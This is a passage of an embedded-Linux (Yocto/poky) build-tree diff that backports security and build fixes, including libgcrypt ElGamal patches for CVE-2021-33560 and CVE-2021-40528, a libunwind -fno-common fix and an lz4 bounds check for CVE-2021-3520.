cipher/elgamal.c | 20 +++++++++++++++++--- + 1 file changed, 17 insertions(+), 3 deletions(-) + +diff --git a/cipher/elgamal.c b/cipher/elgamal.c +index 4eb52d62..9835122f 100644 +--- a/cipher/elgamal.c ++++ b/cipher/elgamal.c +@@ -522,8 +522,9 @@ do_encrypt(gcry_mpi_t a, gcry_mpi_t b, gcry_mpi_t input, ELG_public_key *pkey ) + static void + decrypt (gcry_mpi_t output, gcry_mpi_t a, gcry_mpi_t b, ELG_secret_key *skey ) + { +- gcry_mpi_t t1, t2, r; ++ gcry_mpi_t t1, t2, r, r1, h; + unsigned int nbits = mpi_get_nbits (skey->p); ++ gcry_mpi_t x_blind; + + mpi_normalize (a); + mpi_normalize (b); +@@ -534,20 +535,33 @@ decrypt (gcry_mpi_t output, gcry_mpi_t a, gcry_mpi_t b, ELG_secret_key *skey ) + + t2 = mpi_snew (nbits); + r = mpi_new (nbits); ++ r1 = mpi_new (nbits); ++ h = mpi_new (nbits); ++ x_blind = mpi_snew (nbits); + + /* We need a random number of about the prime size. The random + number merely needs to be unpredictable; thus we use level 0. */ + _gcry_mpi_randomize (r, nbits, GCRY_WEAK_RANDOM); + ++ /* Also, exponent blinding: x_blind = x + (p-1)*r1 */ ++ _gcry_mpi_randomize (r1, nbits, GCRY_WEAK_RANDOM); ++ mpi_set_highbit (r1, nbits - 1); ++ mpi_sub_ui (h, skey->p, 1); ++ mpi_mul (x_blind, h, r1); ++ mpi_add (x_blind, skey->x, x_blind); ++ + /* t1 = r^x mod p */ +- mpi_powm (t1, r, skey->x, skey->p); ++ mpi_powm (t1, r, x_blind, skey->p); + /* t2 = (a * r)^-x mod p */ + mpi_mulm (t2, a, r, skey->p); +- mpi_powm (t2, t2, skey->x, skey->p); ++ mpi_powm (t2, t2, x_blind, skey->p); + mpi_invm (t2, t2, skey->p); + /* t1 = (t1 * t2) mod p*/ + mpi_mulm (t1, t1, t2, skey->p); + ++ mpi_free (x_blind); ++ mpi_free (h); ++ mpi_free (r1); + mpi_free (r); + mpi_free (t2); + +-- +2.11.0 + diff --git a/poky/meta/recipes-support/libgcrypt/files/CVE-2021-40528.patch b/poky/meta/recipes-support/libgcrypt/files/CVE-2021-40528.patch new file mode 100644 index 0000000000..b3a18bc5aa --- /dev/null +++ b/poky/meta/recipes-support/libgcrypt/files/CVE-2021-40528.patch @@ -0,0 +1,109 @@ +From 707c3c5c511ee70ad0e39ec613471f665305fbea Mon Sep 17 00:00:00 2001 +From: NIIBE Yutaka <gniibe@fsij.org> +Date: Fri, 21 May 2021 11:15:07 +0900 +Subject: [PATCH] cipher: Fix ElGamal encryption for other implementations. + +* cipher/elgamal.c (gen_k): Remove support of smaller K. +(do_encrypt): Never use smaller K. +(sign): Folllow the change of gen_k. + +-- + +Cherry-pick master commit of: + 632d80ef30e13de6926d503aa697f92b5dbfbc5e + +This change basically reverts encryption changes in two commits: + + 74386120dad6b3da62db37f7044267c8ef34689b + 78531373a342aeb847950f404343a05e36022065 + +Use of smaller K for ephemeral key in ElGamal encryption is only good, +when we can guarantee that recipient's key is generated by our +implementation (or compatible). + +For detail, please see: + + Luca De Feo, Bertram Poettering, Alessandro Sorniotti, + "On the (in)security of ElGamal in OpenPGP"; + in the proceedings of CCS'2021. + +CVE-id: CVE-2021-33560 +GnuPG-bug-id: 5328 +Suggested-by: Luca De Feo, Bertram Poettering, Alessandro Sorniotti +Signed-off-by: NIIBE Yutaka <gniibe@fsij.org> + +Upstream-Status: Backport +CVE: CVE-2021-40528 +Signed-off-by: Armin Kuster <akuster@mvista.com> +--- + cipher/elgamal.c | 24 ++++++------------------ + 1 file changed, 6 insertions(+), 18 deletions(-) + +diff --git a/cipher/elgamal.c b/cipher/elgamal.c +index 4eb52d62..ae7a631e 100644 +--- a/cipher/elgamal.c ++++ b/cipher/elgamal.c +@@ -66,7 +66,7 @@ static const char *elg_names[] = + + + static int test_keys (ELG_secret_key *sk, unsigned int nbits, int nodie); +-static gcry_mpi_t gen_k (gcry_mpi_t p, int small_k); ++static gcry_mpi_t gen_k (gcry_mpi_t p); + static gcry_err_code_t generate (ELG_secret_key *sk, unsigned nbits, + gcry_mpi_t **factors); + static int check_secret_key (ELG_secret_key *sk); +@@ -189,11 +189,10 @@ test_keys ( ELG_secret_key *sk, unsigned int nbits, int nodie ) + + /**************** + * Generate a random secret exponent k from prime p, so that k is +- * relatively prime to p-1. With SMALL_K set, k will be selected for +- * better encryption performance - this must never be used signing! ++ * relatively prime to p-1. + */ + static gcry_mpi_t +-gen_k( gcry_mpi_t p, int small_k ) ++gen_k( gcry_mpi_t p ) + { + gcry_mpi_t k = mpi_alloc_secure( 0 ); + gcry_mpi_t temp = mpi_alloc( mpi_get_nlimbs(p) ); +@@ -202,18 +201,7 @@ gen_k( gcry_mpi_t p, int small_k ) + unsigned int nbits, nbytes; + char *rndbuf = NULL; + +- if (small_k) +- { +- /* Using a k much lesser than p is sufficient for encryption and +- * it greatly improves the encryption performance. We use +- * Wiener's table and add a large safety margin. */ +- nbits = wiener_map( orig_nbits ) * 3 / 2; +- if( nbits >= orig_nbits ) +- BUG(); +- } +- else +- nbits = orig_nbits; +- ++ nbits = orig_nbits; + + nbytes = (nbits+7)/8; + if( DBG_CIPHER ) +@@ -492,7 +480,7 @@ do_encrypt(gcry_mpi_t a, gcry_mpi_t b, gcry_mpi_t input, ELG_public_key *pkey ) + * error code. + */ + +- k = gen_k( pkey->p, 1 ); ++ k = gen_k( pkey->p ); + mpi_powm (a, pkey->g, k, pkey->p); + + /* b = (y^k * input) mod p +@@ -594,7 +582,7 @@ sign(gcry_mpi_t a, gcry_mpi_t b, gcry_mpi_t input, ELG_secret_key *skey ) + * + */ + mpi_sub_ui(p_1, p_1, 1); +- k = gen_k( skey->p, 0 /* no small K ! */ ); ++ k = gen_k( skey->p ); + mpi_powm( a, skey->g, k, skey->p ); + mpi_mul(t, skey->x, a ); + mpi_subm(t, input, t, p_1 ); +-- +2.30.2 + diff --git a/poky/meta/recipes-support/libgcrypt/libgcrypt_1.8.5.bb b/poky/meta/recipes-support/libgcrypt/libgcrypt_1.8.5.bb index 16a58ad9b8..8045bab9ed 100644 --- a/poky/meta/recipes-support/libgcrypt/libgcrypt_1.8.5.bb +++ b/poky/meta/recipes-support/libgcrypt/libgcrypt_1.8.5.bb @@ -28,6 +28,8 @@ SRC_URI = "${GNUPG_MIRROR}/libgcrypt/libgcrypt-${PV}.tar.bz2 \ file://0002-AES-move-look-up-tables-to-.data-section-and-unshare.patch \ file://0003-GCM-move-look-up-table-to-.data-section-and-unshare-.patch \ file://determinism.patch \ + file://CVE-2021-33560.patch \ + file://CVE-2021-40528.patch \ " SRC_URI[md5sum] = "348cc4601ca34307fc6cd6c945467743" SRC_URI[sha256sum] = "3b4a2a94cb637eff5bdebbcaf46f4d95c4f25206f459809339cdada0eb577ac3" diff --git a/poky/meta/recipes-support/libjitterentropy/libjitterentropy_2.2.0.bb b/poky/meta/recipes-support/libjitterentropy/libjitterentropy_2.2.0.bb index 710ef0172d..841edc6829 100644 --- a/poky/meta/recipes-support/libjitterentropy/libjitterentropy_2.2.0.bb +++ b/poky/meta/recipes-support/libjitterentropy/libjitterentropy_2.2.0.bb @@ -9,7 +9,7 @@ LIC_FILES_CHKSUM = "file://COPYING;md5=a95aadbdfae7ed812bb2b7b86eb5981c \ file://COPYING.gplv2;md5=eb723b61539feef013de476e68b5c50a \ file://COPYING.bsd;md5=66a5cedaf62c4b2637025f049f9b826f \ " -SRC_URI = "git://github.com/smuellerDD/jitterentropy-library.git \ +SRC_URI = "git://github.com/smuellerDD/jitterentropy-library.git;branch=master;protocol=https \ file://0001-Makefile-cleanup-install-for-rebuilds.patch \ file://0001-Make-man-pages-reproducible.patch" SRCREV = "933a44f33ed3d6612f7cfaa7ad1207c8da4886ba" diff --git a/poky/meta/recipes-support/libpcre/libpcre2_10.34.bb b/poky/meta/recipes-support/libpcre/libpcre2_10.34.bb index fa8655e027..f2c36944d8 100644 --- a/poky/meta/recipes-support/libpcre/libpcre2_10.34.bb +++ b/poky/meta/recipes-support/libpcre/libpcre2_10.34.bb @@ -10,7 +10,7 @@ SECTION = "devel" LICENSE = "BSD-3-Clause" LIC_FILES_CHKSUM = "file://LICENCE;md5=b1588d3bb4cb0e1f5a597d908f8c5b37" -SRC_URI = "https://ftp.pcre.org/pub/pcre/pcre2-${PV}.tar.bz2 \ +SRC_URI = "http://downloads.yoctoproject.org/mirror/sources/pcre2-${PV}.tar.bz2 \ file://pcre-cross.patch \ " diff --git a/poky/meta/recipes-support/libpcre/libpcre_8.44.bb b/poky/meta/recipes-support/libpcre/libpcre_8.44.bb index cd80dc7345..3267c5ad72 100644 --- a/poky/meta/recipes-support/libpcre/libpcre_8.44.bb +++ b/poky/meta/recipes-support/libpcre/libpcre_8.44.bb @@ -7,7 +7,7 @@ HOMEPAGE = "http://www.pcre.org" SECTION = "devel" LICENSE = "BSD-3-Clause" LIC_FILES_CHKSUM = "file://LICENCE;md5=3bb381a66a5385b246d4877922e7511e" -SRC_URI = "https://ftp.pcre.org/pub/pcre/pcre-${PV}.tar.bz2 \ +SRC_URI = "${SOURCEFORGE_MIRROR}/pcre/pcre-${PV}.tar.bz2 \ file://run-ptest \ file://Makefile \ " diff --git a/poky/meta/recipes-support/libpsl/libpsl_0.21.0.bb b/poky/meta/recipes-support/libpsl/libpsl_0.21.0.bb index b2dda191ce..66e64f785c 100644 --- a/poky/meta/recipes-support/libpsl/libpsl_0.21.0.bb +++ b/poky/meta/recipes-support/libpsl/libpsl_0.21.0.bb @@ -19,11 +19,10 @@ SRC_URI[sha256sum] = "41bd1c75a375b85c337b59783f5deb93dbb443fb0a52d257f403df7bd6 UPSTREAM_CHECK_URI = "https://github.com/rockdaboot/libpsl/releases" -DEPENDS = "libidn2" - inherit autotools gettext gtk-doc manpages pkgconfig lib_package -PACKAGECONFIG ??= "" +PACKAGECONFIG ?= "idn2" PACKAGECONFIG[manpages] = "--enable-man,--disable-man,libxslt-native" - +PACKAGECONFIG[icu] = "--enable-runtime=libicu --enable-builtin=libicu,,icu" +PACKAGECONFIG[idn2] = "--enable-runtime=libidn2 --enable-builtin=libidn2,,libidn2 libunistring" BBCLASSEXTEND = "native nativesdk" diff --git a/poky/meta/recipes-support/libsoup/libsoup-2.4_2.68.4.bb b/poky/meta/recipes-support/libsoup/libsoup-2.4_2.68.4.bb index 65b32557e7..e42ac30bf2 100644 --- a/poky/meta/recipes-support/libsoup/libsoup-2.4_2.68.4.bb +++ b/poky/meta/recipes-support/libsoup/libsoup-2.4_2.68.4.bb @@ -7,7 +7,7 @@ SECTION = "x11/gnome/libs" LICENSE = "LGPLv2" LIC_FILES_CHKSUM = "file://COPYING;md5=5f30f0716dfdd0d91eb439ebec522ec2" -DEPENDS = "glib-2.0 glib-2.0-native libxml2 sqlite3 intltool-native libpsl" +DEPENDS = "glib-2.0 glib-2.0-native libxml2 sqlite3 libpsl" SHRT_VER = "${@d.getVar('PV').split('.')[0]}.${@d.getVar('PV').split('.')[1]}" diff --git a/poky/meta/recipes-support/libunistring/libunistring_0.9.10.bb b/poky/meta/recipes-support/libunistring/libunistring_0.9.10.bb index 97fac4ecfa..2197b6656d 100644 --- a/poky/meta/recipes-support/libunistring/libunistring_0.9.10.bb +++ b/poky/meta/recipes-support/libunistring/libunistring_0.9.10.bb @@ -18,6 +18,7 @@ LIC_FILES_CHKSUM = "file://COPYING.LIB;md5=6a6a8e020838b23406c81b19c1d46df6 \ file://README;beginline=45;endline=65;md5=08287d16ba8d839faed8d2dc14d7d6a5 \ file://doc/libunistring.texi;md5=287fa6075f78a3c85c1a52b0a92547cd \ " +DEPENDS = "gperf-native" SRC_URI = "${GNU_MIRROR}/libunistring/libunistring-${PV}.tar.gz \ file://iconv-m4-remove-the-test-to-convert-euc-jp.patch \ diff --git a/poky/meta/recipes-support/libunwind/libunwind/0001-Fix-compilation-with-fno-common.patch b/poky/meta/recipes-support/libunwind/libunwind/0001-Fix-compilation-with-fno-common.patch new file mode 100644 index 0000000000..34a1f46b0f --- /dev/null +++ b/poky/meta/recipes-support/libunwind/libunwind/0001-Fix-compilation-with-fno-common.patch @@ -0,0 +1,420 @@ +From 51112447b316813ad1ae50ea66feca4eb755a424 Mon Sep 17 00:00:00 2001 +From: Yichao Yu <yyc1992@gmail.com> +Date: Tue, 31 Mar 2020 00:43:32 -0400 +Subject: [PATCH] Fix compilation with -fno-common. + +[Khem Raj] +Making all other archs consistent with IA64 which should not have this problem. +Also move the FIXME to the correct place. + +Also add some minimum comments about this... + +[Philippe Coval] + +Patch ported to v1.3-stable branch, +patch to be used used in openembedded-core dunfell branch (on v1.3.1) +for oniro project. + +Upstream-Status: Backport [https://github.com/libunwind/libunwind/pull/166] +Signed-off-by: Khem Raj <raj.khem@gmail.com> +Thanks-to: Yichao Yu <yyc1992@gmail.com> +Origin: https://github.com/libunwind/libunwind/commit/29e17d8d2ccbca07c423e3089a6d5ae8a1c9cb6e +Relate-to: https://booting.oniroproject.org/distro/oniro/-/issues/191 +Forwarded: https://github.com/libunwind/libunwind/pull/312 +Last-Update: 2021-11-25 +Signed-off-by: Philippe Coval <philippe.coval@huawei.com> +--- + src/aarch64/Ginit.c | 15 +++++++-------- + src/arm/Ginit.c | 15 +++++++-------- + src/coredump/_UPT_get_dyn_info_list_addr.c | 5 +++++ + src/hppa/Ginit.c | 15 +++++++-------- + src/ia64/Ginit.c | 1 + + src/mi/Gfind_dynamic_proc_info.c | 1 + + src/mips/Ginit.c | 15 +++++++-------- + src/ppc32/Ginit.c | 11 +++++++---- + src/ppc64/Ginit.c | 11 +++++++---- + src/ptrace/_UPT_get_dyn_info_list_addr.c | 5 +++++ + src/sh/Ginit.c | 15 +++++++-------- + src/tilegx/Ginit.c | 15 +++++++-------- + src/x86/Ginit.c | 15 +++++++-------- + src/x86_64/Ginit.c | 15 +++++++-------- + 14 files changed, 82 insertions(+), 72 deletions(-) + +diff --git a/src/aarch64/Ginit.c b/src/aarch64/Ginit.c +index 9c4eae82..cb954b15 100644 +--- a/src/aarch64/Ginit.c ++++ b/src/aarch64/Ginit.c +@@ -61,13 +61,6 @@ tdep_uc_addr (ucontext_t *uc, int reg) + + # endif /* UNW_LOCAL_ONLY */ + +-HIDDEN unw_dyn_info_list_t _U_dyn_info_list; +- +-/* XXX fix me: there is currently no way to locate the dyn-info list +- by a remote unwinder. On ia64, this is done via a special +- unwind-table entry. Perhaps something similar can be done with +- DWARF2 unwind info. */ +- + static void + put_unwind_info (unw_addr_space_t as, unw_proc_info_t *proc_info, void *arg) + { +@@ -78,7 +71,13 @@ static int + get_dyn_info_list_addr (unw_addr_space_t as, unw_word_t *dyn_info_list_addr, + void *arg) + { +- *dyn_info_list_addr = (unw_word_t) &_U_dyn_info_list; ++#ifndef UNW_LOCAL_ONLY ++# pragma weak _U_dyn_info_list_addr ++ if (!_U_dyn_info_list_addr) ++ return -UNW_ENOINFO; ++#endif ++ // Access the `_U_dyn_info_list` from `LOCAL_ONLY` library, i.e. libunwind.so. ++ *dyn_info_list_addr = _U_dyn_info_list_addr (); + return 0; + } + +diff --git a/src/arm/Ginit.c b/src/arm/Ginit.c +index 2720d063..0bac0d72 100644 +--- a/src/arm/Ginit.c ++++ b/src/arm/Ginit.c +@@ -57,18 +57,17 @@ tdep_uc_addr (unw_tdep_context_t *uc, int reg) + + # endif /* UNW_LOCAL_ONLY */ + +-HIDDEN unw_dyn_info_list_t _U_dyn_info_list; +- +-/* XXX fix me: there is currently no way to locate the dyn-info list +- by a remote unwinder. On ia64, this is done via a special +- unwind-table entry. Perhaps something similar can be done with +- DWARF2 unwind info. */ +- + static int + get_dyn_info_list_addr (unw_addr_space_t as, unw_word_t *dyn_info_list_addr, + void *arg) + { +- *dyn_info_list_addr = (unw_word_t) &_U_dyn_info_list; ++#ifndef UNW_LOCAL_ONLY ++# pragma weak _U_dyn_info_list_addr ++ if (!_U_dyn_info_list_addr) ++ return -UNW_ENOINFO; ++#endif ++ // Access the `_U_dyn_info_list` from `LOCAL_ONLY` library, i.e. libunwind.so. ++ *dyn_info_list_addr = _U_dyn_info_list_addr (); + return 0; + } + +diff --git a/src/coredump/_UPT_get_dyn_info_list_addr.c b/src/coredump/_UPT_get_dyn_info_list_addr.c +index 0d119055..739ed056 100644 +--- a/src/coredump/_UPT_get_dyn_info_list_addr.c ++++ b/src/coredump/_UPT_get_dyn_info_list_addr.c +@@ -74,6 +74,11 @@ get_list_addr (unw_addr_space_t as, unw_word_t *dil_addr, void *arg, + + #else + ++/* XXX fix me: there is currently no way to locate the dyn-info list ++ by a remote unwinder. On ia64, this is done via a special ++ unwind-table entry. Perhaps something similar can be done with ++ DWARF2 unwind info. */ ++ + static inline int + get_list_addr (unw_addr_space_t as, unw_word_t *dil_addr, void *arg, + int *countp) +diff --git a/src/hppa/Ginit.c b/src/hppa/Ginit.c +index 461e4b93..265455a6 100644 +--- a/src/hppa/Ginit.c ++++ b/src/hppa/Ginit.c +@@ -64,13 +64,6 @@ _Uhppa_uc_addr (ucontext_t *uc, int reg) + + # endif /* UNW_LOCAL_ONLY */ + +-HIDDEN unw_dyn_info_list_t _U_dyn_info_list; +- +-/* XXX fix me: there is currently no way to locate the dyn-info list +- by a remote unwinder. On ia64, this is done via a special +- unwind-table entry. Perhaps something similar can be done with +- DWARF2 unwind info. */ +- + static void + put_unwind_info (unw_addr_space_t as, unw_proc_info_t *proc_info, void *arg) + { +@@ -81,7 +74,13 @@ static int + get_dyn_info_list_addr (unw_addr_space_t as, unw_word_t *dyn_info_list_addr, + void *arg) + { +- *dyn_info_list_addr = (unw_word_t) &_U_dyn_info_list; ++#ifndef UNW_LOCAL_ONLY ++# pragma weak _U_dyn_info_list_addr ++ if (!_U_dyn_info_list_addr) ++ return -UNW_ENOINFO; ++#endif ++ // Access the `_U_dyn_info_list` from `LOCAL_ONLY` library, i.e. libunwind.so. ++ *dyn_info_list_addr = _U_dyn_info_list_addr (); + return 0; + } + +diff --git a/src/ia64/Ginit.c b/src/ia64/Ginit.c +index b09a2ad5..8601bb3c 100644 +--- a/src/ia64/Ginit.c ++++ b/src/ia64/Ginit.c +@@ -68,6 +68,7 @@ get_dyn_info_list_addr (unw_addr_space_t as, unw_word_t *dyn_info_list_addr, + if (!_U_dyn_info_list_addr) + return -UNW_ENOINFO; + #endif ++ // Access the `_U_dyn_info_list` from `LOCAL_ONLY` library, i.e. libunwind.so. + *dyn_info_list_addr = _U_dyn_info_list_addr (); + return 0; + } +diff --git a/src/mi/Gfind_dynamic_proc_info.c b/src/mi/Gfind_dynamic_proc_info.c +index 98d35012..2e7c62e5 100644 +--- a/src/mi/Gfind_dynamic_proc_info.c ++++ b/src/mi/Gfind_dynamic_proc_info.c +@@ -49,6 +49,7 @@ local_find_proc_info (unw_addr_space_t as, unw_word_t ip, unw_proc_info_t *pi, + return -UNW_ENOINFO; + #endif + ++ // Access the `_U_dyn_info_list` from `LOCAL_ONLY` library, i.e. libunwind.so. + list = (unw_dyn_info_list_t *) (uintptr_t) _U_dyn_info_list_addr (); + for (di = list->first; di; di = di->next) + if (ip >= di->start_ip && ip < di->end_ip) +diff --git a/src/mips/Ginit.c b/src/mips/Ginit.c +index 3df170c7..bf7a8f5a 100644 +--- a/src/mips/Ginit.c ++++ b/src/mips/Ginit.c +@@ -69,13 +69,6 @@ tdep_uc_addr (ucontext_t *uc, int reg) + + # endif /* UNW_LOCAL_ONLY */ + +-HIDDEN unw_dyn_info_list_t _U_dyn_info_list; +- +-/* XXX fix me: there is currently no way to locate the dyn-info list +- by a remote unwinder. On ia64, this is done via a special +- unwind-table entry. Perhaps something similar can be done with +- DWARF2 unwind info. */ +- + static void + put_unwind_info (unw_addr_space_t as, unw_proc_info_t *proc_info, void *arg) + { +@@ -86,7 +79,13 @@ static int + get_dyn_info_list_addr (unw_addr_space_t as, unw_word_t *dyn_info_list_addr, + void *arg) + { +- *dyn_info_list_addr = (unw_word_t) (intptr_t) &_U_dyn_info_list; ++#ifndef UNW_LOCAL_ONLY ++# pragma weak _U_dyn_info_list_addr ++ if (!_U_dyn_info_list_addr) ++ return -UNW_ENOINFO; ++#endif ++ // Access the `_U_dyn_info_list` from `LOCAL_ONLY` library, i.e. libunwind.so. ++ *dyn_info_list_addr = _U_dyn_info_list_addr (); + return 0; + } + +diff --git a/src/ppc32/Ginit.c b/src/ppc32/Ginit.c +index ba302448..7b454558 100644 +--- a/src/ppc32/Ginit.c ++++ b/src/ppc32/Ginit.c +@@ -91,9 +91,6 @@ tdep_uc_addr (ucontext_t *uc, int reg) + + # endif /* UNW_LOCAL_ONLY */ + +-HIDDEN unw_dyn_info_list_t _U_dyn_info_list; +- +- + static void + put_unwind_info (unw_addr_space_t as, unw_proc_info_t *proc_info, void *arg) + { +@@ -104,7 +101,13 @@ static int + get_dyn_info_list_addr (unw_addr_space_t as, unw_word_t *dyn_info_list_addr, + void *arg) + { +- *dyn_info_list_addr = (unw_word_t) &_U_dyn_info_list; ++#ifndef UNW_LOCAL_ONLY ++# pragma weak _U_dyn_info_list_addr ++ if (!_U_dyn_info_list_addr) ++ return -UNW_ENOINFO; ++#endif ++ // Access the `_U_dyn_info_list` from `LOCAL_ONLY` library, i.e. libunwind.so. ++ *dyn_info_list_addr = _U_dyn_info_list_addr (); + return 0; + } + +diff --git a/src/ppc64/Ginit.c b/src/ppc64/Ginit.c +index 4c88cd6e..7bfb395a 100644 +--- a/src/ppc64/Ginit.c ++++ b/src/ppc64/Ginit.c +@@ -95,9 +95,6 @@ tdep_uc_addr (ucontext_t *uc, int reg) + + # endif /* UNW_LOCAL_ONLY */ + +-HIDDEN unw_dyn_info_list_t _U_dyn_info_list; +- +- + static void + put_unwind_info (unw_addr_space_t as, unw_proc_info_t *proc_info, void *arg) + { +@@ -108,7 +105,13 @@ static int + get_dyn_info_list_addr (unw_addr_space_t as, unw_word_t *dyn_info_list_addr, + void *arg) + { +- *dyn_info_list_addr = (unw_word_t) &_U_dyn_info_list; ++#ifndef UNW_LOCAL_ONLY ++# pragma weak _U_dyn_info_list_addr ++ if (!_U_dyn_info_list_addr) ++ return -UNW_ENOINFO; ++#endif ++ // Access the `_U_dyn_info_list` from `LOCAL_ONLY` library, i.e. libunwind.so. ++ *dyn_info_list_addr = _U_dyn_info_list_addr (); + return 0; + } + +diff --git a/src/ptrace/_UPT_get_dyn_info_list_addr.c b/src/ptrace/_UPT_get_dyn_info_list_addr.c +index cc5ed044..16671d45 100644 +--- a/src/ptrace/_UPT_get_dyn_info_list_addr.c ++++ b/src/ptrace/_UPT_get_dyn_info_list_addr.c +@@ -71,6 +71,11 @@ get_list_addr (unw_addr_space_t as, unw_word_t *dil_addr, void *arg, + + #else + ++/* XXX fix me: there is currently no way to locate the dyn-info list ++ by a remote unwinder. On ia64, this is done via a special ++ unwind-table entry. Perhaps something similar can be done with ++ DWARF2 unwind info. */ ++ + static inline int + get_list_addr (unw_addr_space_t as, unw_word_t *dil_addr, void *arg, + int *countp) +diff --git a/src/sh/Ginit.c b/src/sh/Ginit.c +index 52988a72..9fe96d2b 100644 +--- a/src/sh/Ginit.c ++++ b/src/sh/Ginit.c +@@ -58,13 +58,6 @@ tdep_uc_addr (ucontext_t *uc, int reg) + + # endif /* UNW_LOCAL_ONLY */ + +-HIDDEN unw_dyn_info_list_t _U_dyn_info_list; +- +-/* XXX fix me: there is currently no way to locate the dyn-info list +- by a remote unwinder. On ia64, this is done via a special +- unwind-table entry. Perhaps something similar can be done with +- DWARF2 unwind info. */ +- + static void + put_unwind_info (unw_addr_space_t as, unw_proc_info_t *proc_info, void *arg) + { +@@ -75,7 +68,13 @@ static int + get_dyn_info_list_addr (unw_addr_space_t as, unw_word_t *dyn_info_list_addr, + void *arg) + { +- *dyn_info_list_addr = (unw_word_t) &_U_dyn_info_list; ++#ifndef UNW_LOCAL_ONLY ++# pragma weak _U_dyn_info_list_addr ++ if (!_U_dyn_info_list_addr) ++ return -UNW_ENOINFO; ++#endif ++ // Access the `_U_dyn_info_list` from `LOCAL_ONLY` library, i.e. libunwind.so. ++ *dyn_info_list_addr = _U_dyn_info_list_addr (); + return 0; + } + +diff --git a/src/tilegx/Ginit.c b/src/tilegx/Ginit.c +index 7564a558..925e6413 100644 +--- a/src/tilegx/Ginit.c ++++ b/src/tilegx/Ginit.c +@@ -64,13 +64,6 @@ tdep_uc_addr (ucontext_t *uc, int reg) + + # endif /* UNW_LOCAL_ONLY */ + +-HIDDEN unw_dyn_info_list_t _U_dyn_info_list; +- +-/* XXX fix me: there is currently no way to locate the dyn-info list +- by a remote unwinder. On ia64, this is done via a special +- unwind-table entry. Perhaps something similar can be done with +- DWARF2 unwind info. */ +- + static void + put_unwind_info (unw_addr_space_t as, unw_proc_info_t *proc_info, void *arg) + { +@@ -81,7 +74,13 @@ static int + get_dyn_info_list_addr (unw_addr_space_t as, unw_word_t *dyn_info_list_addr, + void *arg) + { +- *dyn_info_list_addr = (unw_word_t) (intptr_t) &_U_dyn_info_list; ++#ifndef UNW_LOCAL_ONLY ++# pragma weak _U_dyn_info_list_addr ++ if (!_U_dyn_info_list_addr) ++ return -UNW_ENOINFO; ++#endif ++ // Access the `_U_dyn_info_list` from `LOCAL_ONLY` library, i.e. libunwind.so. ++ *dyn_info_list_addr = _U_dyn_info_list_addr (); + return 0; + } + +diff --git a/src/x86/Ginit.c b/src/x86/Ginit.c +index f6b8dc27..3cec74a2 100644 +--- a/src/x86/Ginit.c ++++ b/src/x86/Ginit.c +@@ -54,13 +54,6 @@ tdep_uc_addr (ucontext_t *uc, int reg) + + # endif /* UNW_LOCAL_ONLY */ + +-HIDDEN unw_dyn_info_list_t _U_dyn_info_list; +- +-/* XXX fix me: there is currently no way to locate the dyn-info list +- by a remote unwinder. On ia64, this is done via a special +- unwind-table entry. Perhaps something similar can be done with +- DWARF2 unwind info. */ +- + static void + put_unwind_info (unw_addr_space_t as, unw_proc_info_t *proc_info, void *arg) + { +@@ -71,7 +64,13 @@ static int + get_dyn_info_list_addr (unw_addr_space_t as, unw_word_t *dyn_info_list_addr, + void *arg) + { +- *dyn_info_list_addr = (unw_word_t) &_U_dyn_info_list; ++#ifndef UNW_LOCAL_ONLY ++# pragma weak _U_dyn_info_list_addr ++ if (!_U_dyn_info_list_addr) ++ return -UNW_ENOINFO; ++#endif ++ // Access the `_U_dyn_info_list` from `LOCAL_ONLY` library, i.e. libunwind.so. ++ *dyn_info_list_addr = _U_dyn_info_list_addr (); + return 0; + } + +diff --git a/src/x86_64/Ginit.c b/src/x86_64/Ginit.c +index b7e8e462..fe6bcc33 100644 +--- a/src/x86_64/Ginit.c ++++ b/src/x86_64/Ginit.c +@@ -49,13 +49,6 @@ static struct unw_addr_space local_addr_space; + + unw_addr_space_t unw_local_addr_space = &local_addr_space; + +-HIDDEN unw_dyn_info_list_t _U_dyn_info_list; +- +-/* XXX fix me: there is currently no way to locate the dyn-info list +- by a remote unwinder. On ia64, this is done via a special +- unwind-table entry. Perhaps something similar can be done with +- DWARF2 unwind info. */ +- + static void + put_unwind_info (unw_addr_space_t as, unw_proc_info_t *proc_info, void *arg) + { +@@ -66,7 +59,13 @@ static int + get_dyn_info_list_addr (unw_addr_space_t as, unw_word_t *dyn_info_list_addr, + void *arg) + { +- *dyn_info_list_addr = (unw_word_t) &_U_dyn_info_list; ++#ifndef UNW_LOCAL_ONLY ++# pragma weak _U_dyn_info_list_addr ++ if (!_U_dyn_info_list_addr) ++ return -UNW_ENOINFO; ++#endif ++ // Access the `_U_dyn_info_list` from `LOCAL_ONLY` library, i.e. libunwind.so. ++ *dyn_info_list_addr = _U_dyn_info_list_addr (); + return 0; + } + +-- +2.32.0 + diff --git a/poky/meta/recipes-support/libunwind/libunwind_1.3.1.bb b/poky/meta/recipes-support/libunwind/libunwind_1.3.1.bb index 037e04c3c0..8ae94a834c 100644 --- a/poky/meta/recipes-support/libunwind/libunwind_1.3.1.bb +++ b/poky/meta/recipes-support/libunwind/libunwind_1.3.1.bb @@ -7,6 +7,7 @@ SRC_URI = "http://download.savannah.nongnu.org/releases/libunwind/libunwind-${PV file://0004-Fix-build-on-mips-musl.patch \ file://0005-ppc32-Consider-ucontext-mismatches-between-glibc-and.patch \ file://0006-Fix-for-X32.patch \ + file://0001-Fix-compilation-with-fno-common.patch \ " SRC_URI_append_libc-musl = " file://musl-header-conflict.patch" diff --git a/poky/meta/recipes-support/lz4/files/CVE-2021-3520.patch b/poky/meta/recipes-support/lz4/files/CVE-2021-3520.patch new file mode 100644 index 0000000000..5ac8f6691f --- /dev/null +++ b/poky/meta/recipes-support/lz4/files/CVE-2021-3520.patch @@ -0,0 +1,27 @@ +From 8301a21773ef61656225e264f4f06ae14462bca7 Mon Sep 17 00:00:00 2001 +From: Jasper Lievisse Adriaanse <j@jasper.la> +Date: Fri, 26 Feb 2021 15:21:20 +0100 +Subject: [PATCH] Fix potential memory corruption with negative memmove() size + +Upstream-Status: Backport +https://github.com/lz4/lz4/commit/8301a21773ef61656225e264f4f06ae14462bca7#diff-7055e9cf14c488aea9837aaf9f528b58ee3c22988d7d0d81d172ec62d94a88a7 +CVE: CVE-2021-3520 +Signed-off-by: Armin Kuster <akuster@mvista.com> + +--- + lib/lz4.c | 2 +- + 1 file changed, 1 insertion(+), 1 deletion(-) + +Index: git/lib/lz4.c +=================================================================== +--- git.orig/lib/lz4.c ++++ git/lib/lz4.c +@@ -1665,7 +1665,7 @@ LZ4_decompress_generic( + const size_t dictSize /* note : = 0 if noDict */ + ) + { +- if (src == NULL) { return -1; } ++ if ((src == NULL) || (outputSize < 0)) { return -1; } + + { const BYTE* ip = (const BYTE*) src; + const BYTE* const iend = 